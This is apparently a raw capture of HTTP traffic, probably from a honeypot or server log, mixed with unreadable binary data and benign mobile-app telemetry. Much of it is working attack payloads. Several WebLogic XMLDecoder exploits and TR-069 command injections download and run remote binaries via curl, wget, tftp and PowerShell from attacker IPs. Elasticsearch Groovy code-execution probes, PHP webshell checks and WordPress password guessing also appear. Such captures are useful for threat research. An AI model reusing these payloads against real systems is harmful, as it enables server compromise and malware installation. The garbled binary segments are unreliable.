◊	™∏—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIeJE‰ßB‹ßejÅÓMúyíi∆Ÿ‰—:Æ·ó‚† (µ÷a(8x[lïAéG÷ŸpŸ0U¢±±U¨Œ§\e2.fYîœ)Ú}JüHì›˛^&nc˘s ı짩^ª.≈9÷I’Ÿ	P"µ⁄îr’´T*√îtflùÅËLXFÉ5¿îÊ1ë√Ó€}i$X9·X™v≈õflˇD‡ßßz ◊¯)P0—Ú-ô]À?6

POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13

key=KJDF403KJ

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cm.gcm.ksmobile.com/rpc/gcm/report HTTP/1.1
Charset: UTF-8
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cm.gcm.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 428

appflag=khcleanmaster&phonelanguage=in_ID&cmlanguage=in_ID&mcc=510&mnc=10&apkversion=5.14.2.4845&dataversion=2016.7.18.1648&sdkversion=4.4.4&manufacture=Xiaomi&channel=2010002546&trdmarket=1&cl=ID_in&aid=6ccc52a8048214f&timezone=Asia/Jakarta&country=ID&enabled=1&regid=APA91bGWRkNgry8cYyTFS3g5eIn45GwRPU2cMOutNLOJrtD0cDMgD-8kcgnif0oOZW-t9q0dLL3vE7GzHPq5J5vYHNKaQ67rDQ7Lzjmi1JJq5ZsNLMAOa-qBawNqE96V5Lk29ZQUmowh&regtime=1493631697

POST http://check.proxyradar.com/azenv.php?auth=152931069039&a=PSCMN&i=3489034269&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache

E/QPyNrBbBp3QvrgAZuOnhadc1Izn+ru31TLLgkc3qozNi0dkxR+Q9UibdY2K9jig6S43DzAXXYl0HtybtrzZmghDYf5gVpQ3n/IcjJdntAhP9DC52ynvIfMGX0I4lRkuLtFLzPCoi4t6lQF9q3UTP4ZrxwG48kSMT1zF0G3tb4oMMdVL51d0JFoynS3l841AMvBbzVc1C5jcq1/jNW/90XPtFqtjEgh+KYv004/WDdRFEb3ycaJ7yXO9LsXOsZmxxDg/dK8G9vy9+GoBOBrgveRJ6jTOKrlrqnxQsbUosra8uhHA2QVN26aDaFo7hFRtVh8dAIKb8eY6Lml2jxxkEUn5rHYUNqCuXZFJaoe6z2zIk/ZEOF6va8lxD7V6ZXlLQLXw73NARSHW/BD3X7jdWYmxKWZfcmXn2IWotB3pIOMvPtT

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache

R6VZlIiZNpe+i4WDjFd05FDNqcGm2p1lV4B9ypQahhnKEbHIcd3QQbKXwiZcyjisZG9W6qaYuRZKewkXdrgyfhhOHYO17TALNcuAlQzUyY31QpRpaud+4iUe2Rv0oFwo/Y+owp/c3LoKMpYChmNoahTMhoLxHZbqb/fkXmgFm75vOFbq1NIeY28jSBekAYn5vt6oORI5aGNzJ/3mHkb+KZktpz2cBBr8W7LKQjKpsoHnSzKALC/8cUXQhzobJClsYuCmxpFRDn5hmE6DE7EM9h+F8jWaqHsK4Jhhqpw4r2/SENBhMRU5W7RA13uJ6aOw4UG8W1zg2Xw6WVLCaxYt0PqypSiqgtmw2cuGVzt953EaNbrS

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
òã…Ω¢
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\VMZ+jOXV[a~rTL[Z>'B6=[S TDBC
rAYQ^{k[jW[SAoy@\W\gg^VMZ>jONQ	b|N
bBZWjpD	W2-TfQ]M9yDUAFu9
rV_S<|X2*hB[OlyG
eWgBZ2jOUOH!k
`Q]PHmdW
HmkK]=

2!B9-A\7JLZgyC_S^ne
ArW_TJdzDYS^ay
dRVYT+WVASc+N4T
VNd)B	_f|6ET[XnzFYWH{kXj[M>}SX4(3^ZM9pM]UZ2{MQbDM'WVRY{k^jU_XJi{YNus
Q?IH2'[
>%M3Hs)>-_1M
LMZ(jOXV_g{rWDTPIhzL^R_g}fRYU@edWAPuxQaS]TId.GYY1(Pa@VPN?z	[Sdk \LTNhyA\UYnyiVWXjzL\5q6E_[Cq3WAPfx&\ZPKdzF^[_{kX\rD
s/2gI\4V	V<8M;<[|L[Lh|F]WFu:
aS\XJl}EXUZaqd^BCrWUW1pLb@QXXj-YR_bNSb_
RJn}ANOH'ke_V9-1*TiFSPd}_ZR4~
rYJCrD@Ausb^^R@qjAPu*G_~C	
8f8 L7ILMZ(jO]Q^bq|L[Il}GUQ[by`^ZV@mpYNHmk2B_
VJ9CU]2(ePJhq_QYb}
rTDTCj)_WRexTe@SXWd-ARayNgT^XZ dNHmxrRDTTNnyFTVY{kX\rD
s.8&C<MCT=WVWXb{#\_PMoqG]VZchQZY@qjNYH`~3@UXTA;)@
PS3+MVe[A9
29f
yF\Rue
BrDTAe-D_UZ4pPeESIk}FZYgzKT6TLT&jNYR{k^jV_SJozD@A9k3K@>-
y&ZQ1JLZgqM^R_{k[jW[SAoy@\W\gg^VMZ>jONT]exKVcSWh.FU2-1WInxD
AFu9
rFVQ8+D
S6{JcG_
RAd,\\g{
aBZ2jO^OH!khRBC3jON:gJP=JLZgpF@Ause_\PMm|C\URc~
hD
CB+C[P	o(T`WT9+@SYa,M
`R_8jYNHmk
fRd-U[^o*eRYWI?qC]U[1,
O|_D
CBldWAPey`WXQHqjAPu*G_~IV<&>*[|L[HqjNY[f|bS^UNm~MXT^e}3\LRIdyMXZ\fz39zM	
	axPfS
CT8WVA_c-J
b^XLo|
apN6F_]TH;)ATH*eS?\VMZ+jO]SRgx`DZgjD4%MS>I/f	% \KrDCBn}AUS_be
ArW_TJdzDYS^ay
dRVYT+WVAbx2T\Tk+	Y1/M
c_^L>GYQH{kXjV]@iy^d-NW5VWH?-F\SSf*J
`D<
0



POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 530

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;tftp -l 3 -r 1 -g l.ocalhost.host;chmod 777 3;./3`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

AQrjzCZDVwp3sYodql7DMEk1jR13ruI78HZ4uK1CHM+USLesqh49X+mKiae4OnuUaKmzMl4xhraFgFYwuEPgvqTQvqAksaJE5Z2W4Vp5sIHU7AMe+RRPYJUvhwHRGxIb7SL9wombeYnQz9S/XR/5y3Zn1bNL3z42PN1FlMN9sd0vYeSlDsHLIezpENbr5w2htl5JO2zFDZIcdTxnSXX1GNsKxRO2eYCjRvJzGzT09Eqj4ilp3mW52YnC7LkRHe4x3ErGBhIXKWGMFl5Wdd6cnn7S97a7bBGpVPa01oeMr8nN4l1b/+dk0e4M1Puk3HosOJ/xPRKBscfyNWYYU8ZVqBHSWk90+JgCrPr7zmAKz+3yQJRWHpv8bwH0UxLKPWIm9BJORvKMYHweJwcI7u/708Dc1mI/8lWS+w0cVA==

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
l÷yyÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl

POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=149602540431&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue321

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue9

POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 519

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
‡rmqv
wf
C

POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://admaster.union.ucweb.com/usetting/v1/fetch_config HTTP/1.1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Connection: keep-alive
Host: admaster.union.ucweb.com
Content-Type: application/json; charset=utf-8
Content-Length: 259

{"vno":"1495194020093","configs":[{"anchor":"0","name":"app_data"}],"app_id":"5e9abf4638d337bb55007d1fd4244486","chk":"0efb8a6c","info":{"sdk_ve":"3.0.10","pkg_ve":"10.9.0","pkg":"com.uc.browser.en","type":"1","device_hash":"af8795dc3d31775f","sdk_vc":"212"}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1072
Content-Type: multipart/form-data; boundary=nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

47785
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1a62aba177bcf4d483b4de94e2ead21a
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--nm0B09zA07q1w4Y5B2AI9d-SjzGpf0sZBONxBTb--


POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1025
Content-Type: multipart/form-data; boundary=g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

274376
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

f1785b92f1f119e5123ff476bb564f05
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--g4UOsuA186a1H9OEVjarzUFzM6tp4DI--


POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 24
Cache-Control: no-cache

log=jamesatchue&pwd=aaaa

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1306
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile(&apos;http://198.50.179.109:8020/taskhostxz.exe&apos;,&apos;C:/Windows/temp/taskhostxz.exe&apos;);Start-Process &apos;C:/Windows/temp/taskhostxz.exe&apos;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 33
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue99

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 368
Cache-Control: no-cache

SvFfld3LMAcb7s6eiGwhO95VJEm2TOGnKtnY6Sc3R6B+/rHlMsKqTXJ4u3VuVQq4HmGrPVLKOZZt8HXxG+E0k1qCf11BQITrQFHbpqACLe/14LHE9RViPGTl3Mky91WTUYH73hPD2yXVqvHZCMX9DGl9/003Qnc0yqklmSymx7WaPRqBwu5rJ1y5wrG2ON6X9SLN95KIXIonVSmLsizusdQetPRRMRRWK+IUmQtDcikVPvDxdD7PCVqzIgB63ndSkUJSjM6Nzsg2MTL84FN+8Z9L9YZwIl7RhGM+wu5zdgxjNnQhU/2Ms0O6jrp5MOw14IhC3PrjruUeQsI0TV9xwNcoPShrnPEkHR7vfq6bSlrOx/IR

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache

